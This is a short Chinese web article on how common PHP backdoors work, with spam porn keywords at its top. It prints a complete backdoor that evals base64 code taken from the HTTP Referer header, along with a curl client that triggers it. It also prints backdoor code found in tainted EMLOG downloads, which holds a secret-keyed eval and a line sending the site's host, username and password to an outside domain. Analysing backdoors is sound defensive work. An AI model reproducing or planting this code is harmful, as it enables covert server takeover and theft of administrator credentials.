欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一些常見的PHP后門原理分析

  發(fā)布時(shí)間:2014-03-20 16:54:52   作者:佚名   我要評(píng)論
通過(guò)HTTP請(qǐng)求中的HTTP_REFERER來(lái)運(yùn)行經(jīng)過(guò)base64編碼的代碼,來(lái)達(dá)到后門的效果

本地測(cè)試結(jié)果如下圖。

本程序只作為學(xué)習(xí)作用,請(qǐng)勿拿去做壞事。


復(fù)制代碼
代碼如下:

<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要執(zhí)行的代碼
$code = <<<CODE
phpinfo();
CODE;
//進(jìn)行base64編碼
$code = base64_encode($code);
//構(gòu)造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后門url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
CURLOPT_URL => $url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);




最近EMLOG源代碼被污染,有些用戶下載的出現(xiàn)了以下的后門代碼


復(fù)制代碼
代碼如下:

if (isset($_GET["rsdsrv"])) {
if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){
@preg_replace("http://e",$_POST['IN_EMLOG'],"Unauthorization");
}
}
file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));

相關(guān)文章

最新評(píng)論